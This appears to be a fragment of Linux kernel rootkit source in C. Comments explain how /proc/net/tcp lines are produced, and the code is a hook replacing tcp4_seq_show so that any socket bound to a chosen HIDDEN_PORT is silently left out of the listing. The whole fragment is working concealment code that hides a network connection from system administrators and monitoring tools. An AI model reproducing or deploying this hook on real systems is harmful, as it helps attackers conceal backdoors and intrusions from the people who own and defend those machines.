asmlinkage int (*org_tcp4_seq_show) (struct seq_file *seq, void *v);

// /proc/net/tcp entry generates the following output:
    // sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode                                                     
    // 0: 3500007F:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000   101        0 25762 1 0000000000000000 100 0 0 10 0                     
    // 1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 30541 1 0000000000000000 100 0 0 10 0  
    // ...
// by using the following proc entry operations:
// .show		= tcp4_seq_show,
// .start		= tcp_seq_start,
// .next		= tcp_seq_next,
// .stop		= tcp_seq_stop,
// the title is generated by calling tcp_seq_show with *v as 'SEQ_START_TOKEN'
// any other line of /proc/net/tcp is generated by a seprate call to 'tcp4_seq_show' upon a listening/established tcp socket.
// in order to hide a tcp socket from being fetched via /proc/net/tcp we hooked tcp4_seq_show such that:
// if the source port of the socket in matching to HIDDEN PORT - we don't call the original tcp4_seq_show.
static asmlinkage int hook_tcp4_seq_show(struct seq_file *seq, void *v)
{
    struct sock *sk = v;

    // sk->sk_num is the socket source port.
    if (sk != SEQ_START_TOKEN && sk->sk_num == HIDDEN_PORT)
        return 0;

    return org_tcp4_seq_show(seq, v);
}

